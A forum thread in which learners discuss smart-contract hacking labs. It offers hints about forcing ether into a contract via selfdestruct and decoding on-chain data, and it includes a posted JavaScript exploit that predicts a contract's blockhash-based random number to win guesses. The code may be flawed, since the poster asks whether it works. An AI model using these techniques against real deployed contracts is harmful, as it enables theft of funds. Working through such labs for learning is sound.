Bronze IIINeed help on three labs on the Ethereum smart contracts. I managed to do some but stuck on 3 of them so far:
Brute force the hash?
Can't get my code to work for prediciting the numbers...
Absolutely no idea....
Any help would be appreciated :)
Silver Ipuuuh.... I did all of them with some help from netcat
Ep2 > check the chain explorer, you'll find something that you can decode. no brute force needed.
Ep4 > you need to make sure you understand the BigInt in JS vs in ethereum. then you can work with that...
Ep5> empty contract, wtf?! :) --> https://docs.soliditylang.org/en/v0.8.0/contracts.html#receive-ether-function with selfdestruct might give you some ideas...
Bronze IIIWow, that are some interesting thoughts.
EP2: Tried Bytecode decompilation (with various solidity decompilers) and cyber chef, but my brain blocks when it reads blockchain and java
EP4: I will look into this, thank you for the advise
EP5: This is a very very interesting approach. It looks very promising. Thx for that hint :)
Bronze IIIEP5: I set up an own contract with a selfDestruct function. The payout address on destruction was set to the Robin Hood contract address. So on destruction the payout should go to this contract and could not be reversed (at least that was my approach).
Did I make something wrong or is this the wrong approach?
I used the console and truffle for this approach. And yes, I transferred ether to the new deployed contract.
Bronze IIIyou are right. EP-3 is done already. typo. It is EP-2
Bronze IIIasync function exploit() {
try {
// Step 1: Get the last block number
web3.eth.getBlockNumber((error, lastBlockNumber) => {
if (error) {
console.error("Error fetching block number:", error);
} else {
lastBlockNumber -= 1; // Adjust for the previous block
console.log("Last Block Number:", lastBlockNumber);
// Step 2: Fetch the block details using the block number
web3.eth.getBlock(lastBlockNumber, (error, block) => {
if (error) {
console.error("Error fetching block details:", error);
} else {
console.log("Block Details:", block);
let blockHash = block.hash;
console.log("Block Hash:", blockHash);
// Step 3: Convert the block hash to BigNumber
let hashVal = web3.toBigNumber("0x" + blockHash.substring(2));
console.log("Block Hash (BigNumber):", hashVal.toString());
// Step 4: Define the factor and max values
let FACTOR = web3.toBigNumber("35747612576471498868021289613942548619904587962479648126103951055944713673995");
let max = web3.toBigNumber(10);
// Step 5: Calculate the factor
let factor = FACTOR.mul(100).div(max);
console.log("Factor:", factor.toString());
// Step 6: Generate the random number based on block hash
let randomNumber = hashVal.div(factor).mod(max).add(1).toNumber(); // Ensure it's within range
console.log("Generated Random Number (BigNumber):", randomNumber.toString());
// Step 7: Interact with the contract
contract.guess(randomNumber).then((result) => {
console.log("Guess sent: Success!", result);
// Step 8: Query the contract for the number of successful guesses
contract.correctNumberCount()
.then((correctNumberCount) => {
console.log(`Number of successful guesses: ${correctNumberCount}`);
})
.catch((error) => {
console.error("Error fetching correct number count:", error);
});
})
.catch((error) => {
console.error("Error sending guess:", error);
});
}
});
}
});
} catch (error) {
console.error("Unexpected error:", error);
}
}
exploit();I tried this one so far for EP-4. Do I have an error in my thoughts?
